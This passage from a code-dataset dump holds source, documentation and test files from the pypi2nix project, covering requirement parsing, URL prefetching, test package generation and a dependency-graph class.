{fetchgit_arguments} }}\"\n return f'\"${{ {fetchgit_expression } }}/{self.path}\"'\n\n @property\n def revision(self) -> str:\n return self._prefetch_data[\"rev\"]\n\n @property\n def sha256(self) -> str:\n return self._prefetch_data[\"sha256\"]\n\n @property # type: ignore\n @memoize\n def _prefetch_data(self) -> Dict[str, str]:\n return prefetch_git(self.repository_url, self._revision_name)\n\n @memoize\n def fetch(self) -> str:\n with tempfile.TemporaryDirectory() as target_directory:\n cmd(\n [\"git\", \"clone\", self.repository_url, target_directory],\n logger=self._logger,\n )\n cmd(\n [\"git\", \"checkout\", self._revision_name],\n logger=self._logger,\n cwd=target_directory,\n )\n with open(os.path.join(target_directory, self.path)) as f:\n return f.read()\n\n\nclass DiskTextFile(NetworkFile):\n def __init__(self, path: str):\n self._path = path\n\n def nix_expression(self) -> str:\n return self._path\n\n def fetch(self) -> str:\n with open(self._path) as f:\n return f.read()\n" }, { "alpha_fraction": 0.6657534241676331, "alphanum_fraction": 0.7735159993171692, "avg_line_length": 36.75862121582031, "blob_id": "dba7041e3aec95209008b02695112a19736f454a", "content_id": "441041f1b17a94ceb2961f323a1984f33de3815b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1095, "license_type": "permissive", "max_line_length": 120, "num_lines": 29, "path": "/unittests/test_prefetch_url.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom pypi2nix.utils import prefetch_url\n\nfrom .switches import nix\n\n\n@nix\ndef test_prefetch_url_returns_correct_hash(logger):\n url = \"https://github.com/nix-community/pypi2nix/archive/4e85fe7505dd7e703aacc18d9ef45f7e47947a6a.zip\"\n expected_hash = \"1x3dzqlnryplmxm3z1lnl40y0i2g8n6iynlngq2kkknxj9knjyhv\"\n assert prefetch_url(url, logger) == expected_hash\n\n\n@nix\ndef test_prefetch_url_raises_on_invalid_name(logger):\n \"\"\"nix-prefetch-url cannot handle file names with period in them. Here\n we test if the code throws a ValueError in that instance.\n \"\"\"\n url = \"https://raw.githubusercontent.com/nix-community/pypi2nix/6fe6265b62b53377b4677a39c6ee48550c1f2186/.gitignore\"\n with pytest.raises(ValueError):\n prefetch_url(url, logger)\n\n\n@nix\ndef test_can_provide_name_so_prefetch_does_not_fail(logger):\n url = \"https://raw.githubusercontent.com/nix-community/pypi2nix/6fe6265b62b53377b4677a39c6ee48550c1f2186/.gitignore\"\n sha256 = prefetch_url(url, logger, name=\"testname\")\n assert sha256 == \"0b2s1lyfr12v83rrb69j1cfcsksisgwyzfl5mix6qz5ldxfww8p0\"\n" }, { "alpha_fraction": 0.5631901621818542, "alphanum_fraction": 0.5803681015968323, "avg_line_length": 13.348591804504395, "blob_id": "c89b18347af7e45ab93dd2ae65d6c52111381fff", "content_id": "426cab1ef22a8a08de65203e25bf4702acd93eb6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 4075, "license_type": "no_license", "max_line_length": 47, "num_lines": 284, "path": "/source/modules.rst", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "Modules\n=======\n\npypi2nix.logger\n---------------\n\n.. automodule:: pypi2nix.logger\n :members:\n :undoc-members:\n\n\npypi2nix.dependency_graph\n-------------------------\n\n.. automodule:: pypi2nix.dependency_graph\n :members:\n :undoc-members:\n\n\npypi2nix.external_dependencies\n------------------------------\n\n.. automodule:: pypi2nix.external_dependencies\n :members:\n :undoc-members:\n :imported-members:\n\n\npypi2nix.wheels\n---------------\n\n.. automodule:: pypi2nix.wheels\n :members:\n :undoc-members:\n\n\npypi2nix.wheel_builder\n----------------------\n\n.. automodule:: pypi2nix.wheel_builder\n :members:\n :undoc-members:\n\n\npypi2nix.wheel\n--------------\n\n.. automodule:: pypi2nix.wheel\n :members:\n :undoc-members:\n\n\npypi2nix.version\n----------------\n\n.. automodule:: pypi2nix.version\n :members:\n :undoc-members:\n\n\npypi2nix.utils\n--------------\n\n.. automodule:: pypi2nix.utils\n :members:\n :undoc-members:\n\n\npypi2nix.target_platform\n------------------------\n\n.. automodule:: pypi2nix.target_platform\n :members:\n :undoc-members:\n\n\npypi2nix.sources\n----------------\n\n.. automodule:: pypi2nix.sources\n :members:\n :undoc-members:\n\n\npypi2nix.source_distribution\n----------------------------\n\n.. automodule:: pypi2nix.source_distribution\n :members:\n :undoc-members:\n\n\npypi2nix.requirements_file\n--------------------------\n\n.. automodule:: pypi2nix.requirements_file\n :members:\n :undoc-members:\n\n\npypi2nix.requirements_collector\n-------------------------------\n\n.. automodule:: pypi2nix.requirements_collector\n :members:\n :undoc-members:\n\n\npypi2nix.requirements\n---------------------\n\n.. automodule:: pypi2nix.requirements\n :members:\n :undoc-members:\n\n\npypi2nix.requirement_set\n------------------------\n\n.. automodule:: pypi2nix.requirement_set\n :members:\n :undoc-members:\n\n\npypi2nix.requirement_parser\n---------------------------\n\n.. automodule:: pypi2nix.requirement_parser\n :members:\n :undoc-members:\n\n\npypi2nix.python_version\n-----------------------\n\n.. automodule:: pypi2nix.python_version\n :members:\n :undoc-members:\n\n\npypi2nix.pypi_release\n---------------------\n\n.. automodule:: pypi2nix.pypi_release\n :members:\n :undoc-members:\n\n\npypi2nix.pypi_package\n---------------------\n\n.. automodule:: pypi2nix.pypi_package\n :members:\n :undoc-members:\n\n\npypi2nix.pypi\n-------------\n\n.. automodule:: pypi2nix.pypi\n :members:\n :undoc-members:\n\n\npypi2nix.project_directory\n--------------------------\n\n.. automodule:: pypi2nix.project_directory\n :members:\n :undoc-members:\n\n\npypi2nix.pip\n------------\n\n.. automodule:: pypi2nix.pip\n :members:\n :undoc-members:\n :imported-members:\n\n\npypi2nix.package_source\n-----------------------\n\n.. automodule:: pypi2nix.package_source\n :members:\n :undoc-members:\n\n\npypi2nix.package\n----------------\n\n.. automodule:: pypi2nix.package\n :members:\n :undoc-members:\n :imported-members:\n\n\npypi2nix.overrides\n------------------\n\n.. automodule:: pypi2nix.overrides\n :members:\n :undoc-members:\n\n\npypi2nix.nix_language\n---------------------\n\n.. automodule:: pypi2nix.nix_language\n :members:\n :undoc-members:\n\n\npypi2nix.nix\n------------\n\n.. automodule:: pypi2nix.nix\n :members:\n :undoc-members:\n\n\npypi2nix.metadata_fetcher\n-------------------------\n\n.. automodule:: pypi2nix.metadata_fetcher\n :members:\n :undoc-members:\n\n\npypi2nix.memoize\n----------------\n\n.. automodule:: pypi2nix.memoize\n :members:\n :undoc-members:\n\n\npypi2nix.main\n-------------\n\n.. automodule:: pypi2nix.main\n :members:\n :undoc-members:\n\n\npypi2nix.license\n----------------\n\n.. automodule:: pypi2nix.license\n :members:\n :undoc-members:\n\n\npypi2nix.environment_marker\n---------------------------\n\n.. automodule:: pypi2nix.environment_marker\n :members:\n :undoc-members:\n\n\npypi2nix.configuration\n----------------------\n\n.. automodule:: pypi2nix.configuration\n :members:\n :undoc-members:\n\n\npypi2nix.cli\n------------\n\n.. automodule:: pypi2nix.cli\n :members:\n :undoc-members:\n\n\npypi2nix.archive\n----------------\n\n.. automodule:: pypi2nix.archive\n :members:\n :undoc-members:\n" }, { "alpha_fraction": 0.6299835443496704, "alphanum_fraction": 0.6326194405555725, "avg_line_length": 34.70588302612305, "blob_id": "73a3c3cc6357e55848ed62737f5146edbb974112", "content_id": "b8abe706f49b267b94f7ac25c5277e6c01b62001", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3035, "license_type": "permissive", "max_line_length": 88, "num_lines": 85, "path": "/unittests/package_generator.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import shutil\nimport subprocess\nfrom tempfile import TemporaryDirectory\nfrom typing import List\n\nfrom attr import attrib\nfrom attr import attrs\n\nfrom pypi2nix.archive import Archive\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.path import Path\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.source_distribution import SourceDistribution\n\nfrom .templates import render_template\n\n\n@attrs\nclass PackageGenerator:\n \"\"\"Generate source distributions on for testing\n\n This class aims to provide an easy to use way of generating test\n data. Since pypi2nix deals a lot with python packages it is\n necessary have python packages available for testing.\n \"\"\"\n\n _target_directory: Path = attrib()\n _requirement_parser: RequirementParser = attrib()\n _logger: Logger = attrib()\n\n def generate_setuptools_package(\n self, name: str, version: str = \"1.0\", install_requires: List[str] = []\n ) -> SourceDistribution:\n with TemporaryDirectory() as directory_path_string:\n build_directory: Path = Path(directory_path_string)\n self._generate_setup_py(build_directory, name=name, version=version)\n self._generate_setup_cfg(\n build_directory,\n name=name,\n version=version,\n install_requires=install_requires,\n )\n built_distribution_archive = self._build_package(\n build_directory=build_directory, name=name, version=version\n )\n source_distribution = SourceDistribution.from_archive(\n built_distribution_archive,\n logger=self._logger,\n requirement_parser=self._requirement_parser,\n )\n self._move_package_target_directory(built_distribution_archive)\n return source_distribution\n\n def _generate_setup_py(\n self, target_directory: Path, name: str, version: str\n ) -> None:\n content = render_template(Path(\"setup.py\"), context={},)\n (target_directory / \"setup.py\").write_text(content)\n\n def _generate_setup_cfg(\n self,\n target_directory: Path,\n name: str,\n version: str,\n install_requires: List[str],\n ) -> None:\n content = render_template(\n Path(\"setup.cfg\"),\n context={\n \"name\": name,\n \"version\": version,\n \"install_requires\": install_requires,\n },\n )\n (target_directory / \"setup.cfg\").write_text(content)\n\n def _build_package(self, build_directory: Path, name: str, version: str) -> Archive:\n subprocess.run(\n [\"python\", \"setup.py\", \"sdist\"], cwd=str(build_directory), check=True\n )\n tar_gz_path = build_directory / \"dist\" / f\"{name}-{version}.tar.gz\"\n return Archive(path=str(tar_gz_path))\n\n def _move_package_target_directory(self, distribution_archive: Archive) -> None:\n shutil.copy(distribution_archive.path, str(self._target_directory))\n" }, { "alpha_fraction": 0.7098976373672485, "alphanum_fraction": 0.7098976373672485, "avg_line_length": 28.299999237060547, "blob_id": "d35973b9f9ccdd45b196c9832739ad03b0d19f9e", "content_id": "713d5afcaca13df2c1fa2c63dd8ee77ff123c6db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 293, "license_type": "no_license", "max_line_length": 48, "num_lines": 10, "path": "/integrationtests/test_setuptools.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\n\n\nclass SetuptoolsTestCase(IntegrationTest):\n name_of_testcase = \"setuptools\"\n code_to_test = [\"import setuptools\"]\n requirements = [\"setuptools\"]\n\n def requirements_file_check(self, content):\n self.assertIn('\"setuptools\" =', content)\n" }, { "alpha_fraction": 0.6382794976234436, "alphanum_fraction": 0.6387117505073547, "avg_line_length": 39.056278228759766, "blob_id": "a3bbce53cf3c4088667d0aaf801521ac03c8ba8a", "content_id": "6bcfb63bb161f7c4490cf76f2fa104ea29b140d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9253, "license_type": "no_license", "max_line_length": 88, "num_lines": 231, "path": "/src/pypi2nix/dependency_graph.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from collections import defaultdict\nfrom copy import copy\nfrom typing import Callable\nfrom typing import DefaultDict\nfrom typing import Dict\nfrom typing import Generator\nfrom typing import List\nfrom typing import Set\nfrom typing import TypeVar\n\nimport yaml\n\nfrom pypi2nix.external_dependencies import ExternalDependency\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirements import Requirement\nfrom pypi2nix.wheel import Wheel\n\nK = TypeVar(\"K\")\nV = TypeVar(\"V\")\n\n\nclass DependencyGraph:\n def __init__(self) -> None:\n self._runtime_dependencies: DefaultDict[str, Set[str]] = defaultdict(\n lambda: set()\n )\n self._buildtime_dependencies: DefaultDict[str, Set[str]] = defaultdict(\n lambda: set()\n )\n self._external_dependencies: DefaultDict[\n str, Set[ExternalDependency]\n ] = defaultdict(lambda: set())\n\n def set_runtime_dependency(\n self, dependent: Requirement, dependency: Requirement\n ) -> None:\n self._raise_on_cyclic_dependency(dependent, dependency)\n self._runtime_dependencies[dependent.name()].add(dependency.name())\n\n def set_buildtime_dependency(\n self, dependent: Requirement, dependency: Requirement\n ) -> None:\n self._raise_on_cyclic_dependency(dependent, dependency)\n self._buildtime_dependencies[dependent.name()].add(dependency.name())\n\n def set_external_dependency(\n self, dependent: Requirement, dependency: ExternalDependency\n ) -> None:\n self._external_dependencies[dependent.name()].add(dependency)\n\n def is_runtime_dependency(\n self, dependent: Requirement, dependency: Requirement\n ) -> bool:\n return self._is_runtime_child(dependent.name(), dependency.name())\n\n def is_buildtime_dependency(\n self, dependent: Requirement, dependency: Requirement\n ) -> bool:\n return self._is_python_child(dependent.name(), dependency.name())\n\n def get_all_build_dependency_names(self, package: Requirement) -> Set[str]:\n return set(self._get_python_children(package.name()))\n\n def get_all_runtime_dependency_names(self, package: Requirement) -> Set[str]:\n return set(self._get_runtime_children(package.name()))\n\n def get_all_external_dependencies(\n self, package: Requirement\n ) -> Set[ExternalDependency]:\n found_dependencies: Set[ExternalDependency] = set()\n for package_name in self._get_python_children(package.name()):\n found_dependencies.update(self._external_dependencies[package_name])\n return found_dependencies\n\n def import_wheel(self, wheel: Wheel, requirement_parser: RequirementParser) -> None:\n dependent = requirement_parser.parse(wheel.name)\n for runtime_dependency in wheel.runtime_dependencies(wheel.target_platform()):\n\n self.set_runtime_dependency(dependent, runtime_dependency)\n for build_dependency in wheel.build_dependencies(wheel.target_platform()):\n self.set_buildtime_dependency(dependent, build_dependency)\n\n def serialize(self) -> str:\n document: DefaultDict[str, Dict[str, List[str]]] = defaultdict(lambda: dict())\n for key, external_dependencies in self._external_dependencies.items():\n document[key][\"externalDependencies\"] = [\n dep.attribute_name() for dep in external_dependencies\n ]\n for key, runtime_dependencies in self._runtime_dependencies.items():\n document[key][\"runtimeDependencies\"] = list(runtime_dependencies)\n for key, buildtime_dependencies in self._buildtime_dependencies.items():\n document[key][\"buildtimeDependencies\"] = list(buildtime_dependencies)\n return yaml.dump(dict(document)) # type: ignore\n\n @classmethod\n def deserialize(_class, data: str) -> \"DependencyGraph\":\n document: DefaultDict[str, Dict[str, List[str]]]\n document = yaml.load(data, Loader=yaml.Loader)\n graph = DependencyGraph()\n for package, dependencies in document.items():\n external_dependencies = dependencies.get(\"externalDependencies\")\n if external_dependencies is not None:\n graph._external_dependencies[package] = {\n ExternalDependency(name) for name in external_dependencies\n }\n runtime_dependencies = dependencies.get(\"runtimeDependencies\")\n if runtime_dependencies is not None:\n graph._runtime_dependencies[package] = set(runtime_dependencies)\n buildtime_dependencies = dependencies.get(\"buildtimeDependencies\")\n if buildtime_dependencies is not None:\n graph._buildtime_dependencies[package] = set(buildtime_dependencies)\n return graph\n\n def _raise_on_cyclic_dependency(\n self, dependent: Requirement, dependency: Requirement\n ) -> None:\n if self.is_buildtime_dependency(dependency, dependent):\n raise CyclicDependencyOccured(\n f\"Failed to add dependency {dependent} -> {dependency} to Graph \"\n f\"since {dependent} is alread a dependency of {dependency}\"\n )\n\n def _is_python_child(self, dependent: str, dependency: str) -> bool:\n for child in self._get_python_children(dependent):\n if child == dependency:\n return True\n return False\n\n def _is_runtime_child(self, dependent: str, dependency: str) -> bool:\n for child in self._get_runtime_children(dependent):\n if child == dependency:\n return True\n return False\n\n def _get_python_children(self, package_name: str) -> Generator[str, None, None]:\n alread_seen: Set[str] = set()\n pending: Set[str] = {package_name}\n while pending:\n package = pending.pop()\n yield package\n alread_seen.add(package)\n for dependency in (\n self._runtime_dependencies[package]\n | self._buildtime_dependencies[package]\n ):\n if dependency in alread_seen:\n continue\n else:\n pending.add(dependency)\n\n def _get_runtime_children(self, package_name: str) -> Generator[str, None, None]:\n alread_seen: Set[str] = set()\n pending: Set[str] = {package_name}\n while pending:\n package = pending.pop()\n yield package\n alread_seen.add(package)\n for dependency in self._runtime_dependencies[package]:\n if dependency in alread_seen:\n continue\n else:\n pending.add(dependency)\n\n def __add__(self, other: \"DependencyGraph\") -> \"DependencyGraph\":\n new_graph = DependencyGraph()\n new_graph._runtime_dependencies = _merge_defaultdicts(\n self._runtime_dependencies, other._runtime_dependencies\n )\n new_graph._buildtime_dependencies = _merge_defaultdicts(\n self._buildtime_dependencies, other._buildtime_dependencies\n )\n new_graph._external_dependencies = _merge_defaultdicts(\n self._external_dependencies, other._external_dependencies\n )\n return new_graph\n\n def __copy__(self) -> \"DependencyGraph\":\n new_graph = DependencyGraph()\n new_graph._buildtime_dependencies = copy(self._buildtime_dependencies)\n new_graph._runtime_dependencies = copy(self._runtime_dependencies)\n new_graph._external_dependencies = copy(self._external_dependencies)\n return new_graph\n\n def __eq__(self, other: object) -> bool:\n if isinstance(other, DependencyGraph):\n return (\n self._runtime_dependencies == other._runtime_dependencies\n and self._buildtime_dependencies == other._buildtime_dependencies\n and self._external_dependencies == other._external_dependencies\n )\n else:\n return False\n\n def __repr__(self) -> str:\n return (\n \"DependencyGraph(\"\n f\"runtime_dependencies={repr(self._runtime_dependencies)}, \"\n f\"buildtime_dependencies={repr(self._buildtime_dependencies)}, \"\n f\"external_dependencies={repr(self._external_dependencies)}\"\n \")\"\n )\n\n\nclass CyclicDependencyOccured(Exception):\n pass\n\n\ndef _merge_defaultdicts(\n first: DefaultDict[str, Set[V]], second: DefaultDict[str, Set[V]]\n) -> DefaultDict[str, Set[V]]:\n return _merge_with_combine(\n first, second, combine_function=lambda x, y: x | y, constructor=lambda: set(),\n )\n\n\ndef _merge_with_combine(\n first: DefaultDict[K, V],\n second: DefaultDict[K, V],\n combine_function: Callable[[V, V], V],\n constructor: Callable[[], V],\n) -> DefaultDict[K, V]:\n combination: DefaultDict[K, V] = defaultdict(constructor)\n for first_key, first_value in first.items():\n combination[first_key] = first_value\n for second_key, second_value in second.items():\n combination[second_key] = (\n combine_function(combination[second_key], second_value)\n if second_key in combination\n else second_value\n )\n return combination\n" }, { "alpha_fraction": 0.7026957869529724, "alphanum_fraction": 0.7180273532867432, "avg_line_length": 34.49659729003906, "blob_id": "301ad705f870f4cfda23bbe85a276fdbc0291168", "content_id": "c8c00e0cb07af5f55e725ddd4631b652bd9c206e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15654, "license_type": "permissive", "max_line_length": 115, "num_lines": 441, "path": "/unittests/test_requirement.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\n\nimport pytest\n\nfrom pypi2nix.package_source import GitSource\nfrom pypi2nix.package_source import HgSource\nfrom pypi2nix.package_source import PathSource\nfrom pypi2nix.requirement_parser import ParsingFailed\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirements import IncompatibleRequirements\nfrom pypi2nix.requirements import PathRequirement\nfrom pypi2nix.requirements import UrlRequirement\nfrom pypi2nix.requirements import VersionRequirement\n\nfrom .switches import nix\n\n\ndef test_requirement_cannot_be_constructed_from_line_containing_newline(\n requirement_parser,\n):\n with pytest.raises(ParsingFailed):\n requirement_parser.parse(\"pypi2nix\\n >= 1.0\")\n\n\ndef test_requirement_finds_name_of_pypi_packages(requirement_parser):\n requirement = requirement_parser.parse(\"pypi2nix\")\n assert requirement.name() == \"pypi2nix\"\n\n\ndef test_requirement_detects_source_of_pypi_package_as_none(requirement_parser):\n requirement = requirement_parser.parse(\"pypi2nix\")\n assert requirement.source() is None\n\n\ndef test_requirement_finds_name_of_git_package(requirement_parser):\n requirement = requirement_parser.parse(\n \"git+https://github.com/nix-community/pypi2nix.git#egg=pypi2nix\"\n )\n assert requirement.name() == \"pypi2nix\"\n\n\ndef test_requirement_finds_name_of_hg_package(requirement_parser):\n requirement = requirement_parser.parse(\"hg+https://url.test/repo#egg=testegg\")\n assert requirement.name() == \"testegg\"\n\n\ndef test_requirement_finds_name_of_url_package(requirement_parser):\n requirement = requirement_parser.parse(\"https://url.test/repo#egg=testegg\")\n assert requirement.name() == \"testegg\"\n\n\ndef test_requirement_can_handle_environment_marker(requirement_parser):\n requirement = requirement_parser.parse(\"pypi2nix; os_name == '%s'\" % os.name)\n assert requirement.name() == \"pypi2nix\"\n\n\ndef test_applies_to_target_works_properly_with_positiv_marker(\n current_platform, requirement_parser\n):\n requirement = requirement_parser.parse(\"pypi2nix; os_name == '%s'\" % os.name)\n assert requirement.applies_to_target(current_platform)\n\n\ndef test_applies_to_target_works_properly_with_negative_marker(\n current_platform, requirement_parser\n):\n requirement = requirement_parser.parse(\"pypi2nix; os_name != '%s'\" % os.name)\n assert not requirement.applies_to_target(current_platform)\n\n\n@pytest.mark.parametrize(\n \"line, expected\",\n [\n (\"PyPi2Nix\", \"pypi2nix\"),\n (\"TestReq >= 1.0\", \"testreq\"),\n (\"path/to/req#egg=test_req\", \"test-req\"),\n (\"https://test.test#egg=Test_Req\", \"test-req\"),\n ],\n)\ndef test_names_of_requirements_are_canonicalized(line, expected, requirement_parser):\n requirement = requirement_parser.parse(line)\n assert requirement.name() == expected\n\n\ndef test_to_line_reproduces_canonicalized_name(requirement_parser):\n name = \"pypi2nix\"\n requirement = requirement_parser.parse(name)\n assert name in requirement.to_line()\n\n\ndef test_to_line_reproduces_version_specifier(requirement_parser):\n line = \"pypi2nix < 2.0, >= 1.9\"\n requirement = requirement_parser.parse(line)\n assert \"< 2.0\" in requirement.to_line()\n assert \">= 1.9\" in requirement.to_line()\n\n\ndef test_from_line_recognizes_git_sources(requirement_parser):\n line = \"git+https://test.test/test#egg=test-egg\"\n requirement = requirement_parser.parse(line)\n assert requirement.name() == \"test-egg\"\n assert isinstance(requirement.source(), GitSource)\n\n\ndef test_from_line_accepts_requirement_with_marker_including_in_operator(\n requirement_parser,\n):\n requirement = requirement_parser.parse(\"zipfile36; python_version in '3.3 3.4 3.5'\")\n assert requirement.name() == \"zipfile36\"\n\n\ndef test_that_applies_to_target_works_with_in_keyword(\n current_platform, requirement_parser\n):\n requirement = requirement_parser.parse(\n \"pypi2nix; python_version in '{}'\".format(current_platform.python_version)\n )\n assert requirement.applies_to_target(current_platform)\n\n\ndef test_that_mercurial_source_url_gets_detected(requirement_parser):\n requirement = requirement_parser.parse(\n \"hg+https://bitbucket.org/tarek/flake8@a209fb6#egg=flake8\"\n )\n assert isinstance(requirement, UrlRequirement)\n assert requirement.url() == \"hg+https://bitbucket.org/tarek/flake8@a209fb6\"\n\n\n@nix\ndef test_that_mercurial_source_extracted_is_valid(requirement_parser):\n requirement = requirement_parser.parse(\n \"hg+https://bitbucket.org/tarek/flake8@a209fb6#egg=flake8\"\n )\n source = requirement.source()\n assert isinstance(source, HgSource)\n source.nix_expression()\n\n\n@nix\ndef test_that_git_source_extracted_is_valid(requirement_parser):\n requirement = requirement_parser.parse(\n \"git+https://github.com/nix-community/pypi2nix.git@5c65345a2ce7f2f1c376f983d20e935c09c15995#egg=pypi2nix\"\n )\n source = requirement.source()\n assert isinstance(source, GitSource)\n source.nix_expression()\n\n\ndef test_that_from_line_to_line_preserves_urls(requirement_parser):\n line = \"git+https://example.test/#egg=testegg\"\n requirement = requirement_parser.parse(line)\n assert requirement.to_line() == line\n\n\ndef test_that_to_line_reproduces_path_correctly(requirement_parser: RequirementParser):\n line = \"path/to/requirement#egg=test-requirement\"\n requirement = requirement_parser.parse(line)\n requirement = requirement_parser.parse(requirement.to_line())\n assert isinstance(requirement, UrlRequirement)\n assert requirement.url() == \"file://path/to/requirement\"\n\n\ndef test_that_requirements_can_be_added_together_adding_version_constraints(\n current_platform, requirement_parser\n):\n req1 = requirement_parser.parse(\"req >= 1.0\")\n assert isinstance(req1, VersionRequirement)\n req2 = requirement_parser.parse(\"req >= 2.0\")\n assert isinstance(req2, VersionRequirement)\n sum_requirement = req1.add(req2, current_platform)\n assert isinstance(sum_requirement, VersionRequirement)\n assert len(sum_requirement.version()) == len(req1.version()) + len(req2.version())\n\n\ndef test_that_adding_requirements_with_different_names_throws(\n current_platform, requirement_parser\n):\n req1 = requirement_parser.parse(\"req1\")\n req2 = requirement_parser.parse(\"req2\")\n with pytest.raises(IncompatibleRequirements):\n req1.add(req2, current_platform)\n\n\ndef test_that_adding_requirements_with_a_version_and_a_url_results_in_url_requirement(\n current_platform, requirement_parser\n):\n for direction in [\"forward\", \"reverse\"]:\n req1 = requirement_parser.parse(\"req1 >= 1.0\")\n req2 = requirement_parser.parse(\"git+https://test.test/path#egg=req1\")\n if direction == \"forward\":\n sum_requirement = req1.add(req2, current_platform)\n else:\n sum_requirement = req2.add(req1, current_platform)\n\n assert isinstance(sum_requirement, UrlRequirement)\n assert sum_requirement.url() == \"git+https://test.test/path\"\n\n\ndef test_that_adding_requirements_with_different_urls_raises(\n current_platform, requirement_parser\n):\n req1 = requirement_parser.parse(\"https://url1.test#egg=req\")\n req2 = requirement_parser.parse(\"https://url2.test#egg=req\")\n with pytest.raises(IncompatibleRequirements):\n req1.add(req2, current_platform)\n\n\ndef test_that_adding_requirements_with_the_same_url_works(\n current_platform, requirement_parser\n):\n req1 = requirement_parser.parse(\"https://url.test#egg=req\")\n req2 = requirement_parser.parse(\"https://url.test#egg=req\")\n sum_requirement = req1.add(req2, current_platform)\n\n assert isinstance(sum_requirement, UrlRequirement)\n assert sum_requirement.url() == \"https://url.test\"\n\n\ndef test_that_adding_requirements_where_one_does_not_apply_to_system_yields_the_other(\n current_platform, requirement_parser\n):\n req1 = requirement_parser.parse(\"req1\")\n req2 = requirement_parser.parse(\n 'req1 >= 1.0; python_version == \"1.0\"'\n ) # definitly not true\n sum_requirement = req1.add(req2, current_platform)\n assert isinstance(sum_requirement, VersionRequirement)\n assert not sum_requirement.version()\n\n\ndef test_that_we_parse_requirements_with_file_paths(requirement_parser):\n requirement = requirement_parser.parse(\"path/to/egg#egg=testegg\")\n assert isinstance(requirement, PathRequirement)\n assert requirement.name() == \"testegg\"\n assert requirement.path() == \"path/to/egg\"\n\n\n@pytest.mark.parametrize(\n \"req_line_1\",\n [\"req\", \"req <= 1.0\", \"https://test.test#egg=req\", \"path/to/egg#egg=req\"],\n)\n@pytest.mark.parametrize(\"req_line_2\", [\"req\", \"req <= 2.0\"])\ndef test_that_we_can_add_two(\n req_line_1, req_line_2, current_platform, requirement_parser\n):\n requirement1 = requirement_parser.parse(req_line_1)\n requirement2 = requirement_parser.parse(req_line_2)\n requirement1.add(requirement2, current_platform)\n\n\n@pytest.mark.parametrize(\n \"version_requirement_line\",\n (\n \"test-req\",\n \"test-req <= 1.0\",\n \"test-req; python_version == '3.7'\",\n \"test-req; python_version != '3.7'\",\n ),\n)\n@pytest.mark.parametrize(\n \"path_requirement_line\",\n (\"path/to/req#egg=test-req\", \"path/to/req#egg=test-req[extra]\"),\n)\ndef test_that_we_can_add_version_with_path_requirement_result_is_path_requirement(\n version_requirement_line,\n path_requirement_line,\n current_platform,\n requirement_parser,\n):\n req1 = requirement_parser.parse(version_requirement_line)\n req2 = requirement_parser.parse(path_requirement_line)\n sum_requirement = req1.add(req2, current_platform)\n assert isinstance(sum_requirement, PathRequirement)\n\n sum_requirement = req2.add(req1, current_platform)\n assert isinstance(sum_requirement, PathRequirement)\n\n\n@pytest.mark.parametrize(\n \"version_requirement_line\",\n (\n \"test-req\",\n \"test-req <= 1.0\",\n \"test-req; python_version == '3.7'\",\n \"test-req; python_version != '3.7'\",\n ),\n)\n@pytest.mark.parametrize(\n \"url_requirement_line\",\n (\"https://test.test/#egg=test-req\", \"https://test.test/#egg=test-req[extra]\"),\n)\ndef test_can_add_version_requirement_with_url_requirement(\n version_requirement_line, url_requirement_line, current_platform, requirement_parser\n):\n req1 = requirement_parser.parse(version_requirement_line)\n req2 = requirement_parser.parse(url_requirement_line)\n sum_requirement = req1.add(req2, current_platform)\n assert isinstance(sum_requirement, UrlRequirement)\n\n sum_requirement = req2.add(req1, current_platform)\n assert isinstance(sum_requirement, UrlRequirement)\n\n\n@pytest.mark.parametrize(\n \"url_requirement_line\",\n (\"https://test.test#egg=test-req\", \"https://test.test#egg=test-req[extra1]\"),\n)\n@pytest.mark.parametrize(\n \"path_requirement_line\",\n (\"path/to/req#egg=test-req\", \"path/to/req#egg=test-req[extra2]\"),\n)\ndef test_cannot_add_path_and_url_requirement(\n path_requirement_line, url_requirement_line, current_platform, requirement_parser\n):\n req1 = requirement_parser.parse(path_requirement_line)\n req2 = requirement_parser.parse(url_requirement_line)\n with pytest.raises(IncompatibleRequirements):\n req1.add(req2, current_platform)\n\n with pytest.raises(IncompatibleRequirements):\n req2.add(req1, current_platform)\n\n\ndef test_cannot_add_requirements_with_different_paths(\n current_platform, requirement_parser\n):\n req1 = requirement_parser.parse(\"path/1#egg=test-req\")\n req2 = requirement_parser.parse(\"path/2#egg=test-req\")\n\n with pytest.raises(IncompatibleRequirements):\n req1.add(req2, current_platform)\n\n\ndef test_that_we_cannot_add_path_requirements_with_different_names(\n current_platform, requirement_parser\n):\n req1 = requirement_parser.parse(\"path/to/req#egg=req1\")\n req2 = requirement_parser.parse(\"path/to/req#egg=req2\")\n\n with pytest.raises(IncompatibleRequirements):\n req1.add(req2, current_platform)\n\n\ndef test_adding_path_requirements_where_one_requirement_does_not_apply(\n current_platform, requirement_parser\n):\n req1 = requirement_parser.parse(\"path/to/req#egg=test-req\")\n req2 = requirement_parser.parse(\n 'different/path#egg=test-req; python_version == \"1.0\"'\n )\n\n assert req1.add(req2, current_platform) == req1\n assert req2.add(req1, current_platform) == req1\n\n\ndef test_that_we_can_add_path_requirements_with_same_path(\n current_platform, requirement_parser\n):\n req1 = requirement_parser.parse(\"path/to/requirement#egg=test-req\")\n req2 = requirement_parser.parse(\"path/to/requirement#egg=test-req\")\n\n assert req1.add(req2, current_platform) == req1\n\n\ndef test_that_we_can_change_path_of_path_requirements(requirement_parser):\n 